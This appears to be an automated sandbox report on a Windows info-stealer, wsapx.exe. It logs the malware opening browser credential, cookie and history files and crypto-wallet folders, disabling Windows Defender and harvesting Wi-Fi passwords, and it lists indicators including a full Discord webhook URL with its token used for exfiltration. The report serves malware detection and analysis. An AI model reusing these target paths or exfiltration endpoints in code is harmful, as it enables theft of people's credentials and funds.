              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfbaJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.defaultJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: Process Memory Space: wsapx.exe PID: 7432, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000002.00000003.2648275073.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2653293501.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2152150044.0000015A08634000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2643435154.000001C87B04B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2152150044.0000015A08632000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wsapx.exe PID: 7372, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wsapx.exe PID: 7432, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI73722\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: wsapx.exe PID: 7432, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              File and Directory Permissions Modification
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              3
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts2
              Native API
              2
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              4
              Disable or Modify Tools
              LSASS Memory3
              File and Directory Discovery
              Remote Desktop Protocol3
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts122
              Command and Scripting Interpreter
              Logon Script (Windows)11
              Process Injection
              11
              Deobfuscate/Decode Files or Information
              Security Account Manager59
              System Information Discovery
              SMB/Windows Admin Shares1
              Email Collection
              4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login Hook2
              Registry Run Keys / Startup Folder
              21
              Obfuscated Files or Information
              NTDS261
              Security Software Discovery
              Distributed Component Object Model1
              Clipboard Data
              5
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Software Packing
              LSA Secrets2
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials151
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry
              Proc Filesystem1
              Remote System Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
              Virtualization/Sandbox Evasion
              /etc/passwd and /etc/shadow1
              System Network Configuration Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Access Token Manipulation
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
              Process Injection
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574324 Sample: wsapx.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 70 ip-api.com 2->70 72 discord.com 2->72 74 blank-5eoty.in 2->74 82 Found malware configuration 2->82 84 Sigma detected: Capture Wi-Fi password 2->84 86 Multi AV Scanner detection for submitted file 2->86 88 11 other signatures 2->88 11 wsapx.exe 22 2->11         started        15 svchost.exe 2->15         started        signatures3 process4 dnsIp5 62 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->62 dropped 64 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->64 dropped 66 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->66 dropped 68 16 other files (none is malicious) 11->68 dropped 114 Modifies Windows Defender protection settings 11->114 116 Adds a directory exclusion to Windows Defender 11->116 118 Tries to harvest and steal WLAN passwords 11->118 120 2 other signatures 11->120 18 wsapx.exe 89 11->18         started        80 127.0.0.1 unknown unknown 15->80 file6 signatures7 process8 dnsIp9 76 ip-api.com 208.95.112.1, 49721, 49823, 80 TUT-ASUS United States 18->76 78 discord.com 162.159.136.232, 443, 49832 CLOUDFLARENETUS United States 18->78 90 Found many strings related to Crypto-Wallets (likely being stolen) 18->90 92 Tries to harvest and steal browser information (history, passwords, etc) 18->92 94 Modifies Windows Defender protection settings 18->94 96 6 other signatures 18->96 22 cmd.exe 1 18->22         started        25 cmd.exe 1 18->25         started        27 cmd.exe 18->27         started        29 31 other processes 18->29 signatures10 process11 signatures12 98 Suspicious powershell command line found 22->98 100 Uses cmd line tools excessively to alter registry or file data 22->100 102 Encrypted powershell cmdline option found 22->102 112 2 other signatures 22->112 31 powershell.exe 23 22->31         started        34 conhost.exe 22->34         started        104 Modifies Windows Defender protection settings 25->104 106 Removes signatures from Windows Defender 25->106 36 powershell.exe 23 25->36         started        46 2 other processes 25->46 108 Adds a directory exclusion to Windows Defender 27->108 38 powershell.exe 27->38         started        40 conhost.exe 27->40         started        110 Tries to harvest and steal WLAN passwords 29->110 42 tree.com 29->42         started        44 getmac.exe 29->44         started        48 58 other processes 29->48 process13 file14 122 Loading BitLocker PowerShell Module 36->122 124 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 42->124 126 Writes or reads registry keys via WMI 42->126 56 C:\Users\user\AppData\...\uses4c50.cmdline, Unicode 48->56 dropped 58 C:\Users\user\AppData\Local\Temp\bALb7.zip, RAR 48->58 dropped 51 csc.exe 48->51         started        signatures15 process16 file17 60 C:\Users\user\AppData\Local\...\uses4c50.dll, PE32 51->60 dropped 54 cvtres.exe 51->54         started        process18

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              wsapx.exe39%ReversingLabsWin64.Trojan.Znyonm
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI73722\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\_bz2.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\_ctypes.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\_decimal.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\_hashlib.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\_queue.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\_socket.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\_sqlite3.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\_ssl.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\libcrypto-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\libssl-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\python312.dll4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\select.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\sqlite3.dll4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73722\unicodedata.pyd4%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://api.anonfiles.com/upload0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              discord.com
              162.159.136.232
              truefalse
                high
                ip-api.com
                208.95.112.1
                truefalse
                  high
                  blank-5eoty.in
                  unknown
                  unknownfalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMGfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabwsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://github.com/Blank-c/BlankOBFwsapx.exe, 00000002.00000003.2175226074.000001C87A147000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2175509272.000001C879D31000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.avito.ru/wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/ac/?q=wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://api.telegram.org/botwsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                high
                                https://www.ctrip.com/wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#wsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://www.leboncoin.fr/wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      high
                                      https://tools.ietf.org/html/rfc2388#section-4.4wsapx.exe, 00000002.00000002.2653029394.000001C879D92000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64wsapx.exe, 00000002.00000002.2652361959.000001C879844000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2158361673.000001C879A7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://weibo.com/wsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmpfalse
                                            high
                                            https://api.anonfiles.com/uploadwsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPswsapx.exe, 00000002.00000002.2655646494.000001C87A2A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                              high
                                              https://www.msn.comwsapx.exe, 00000002.00000002.2665843936.000001C87B248000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.2289972214.000002A23ACB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2442904993.000001FAD4F50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://discord.com/api/v9/users/wsapx.exe, 00000002.00000002.2652550668.000001C879930000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963wsapx.exe, 00000002.00000002.2655646494.000001C87A310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      http://cacerts.digiwsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://peps.python.org/pep-0205/wsapx.exe, 00000002.00000002.2652550668.000001C879930000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.reddit.com/wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.2263605331.000002A22AC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2442904993.000001FAD3521000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamewsapx.exe, 00000002.00000002.2651928878.000001C8794D0000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxywsapx.exe, 00000002.00000002.2655861700.000001C87A3B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.ebay.co.uk/wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000041.00000002.2442904993.000001FAD4E0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.2263605331.000002A22AE69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.ebay.de/wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000041.00000002.2442904993.000001FAD4E0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codewsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://go.micropowershell.exe, 00000041.00000002.2442904993.000001FAD43FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerwsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
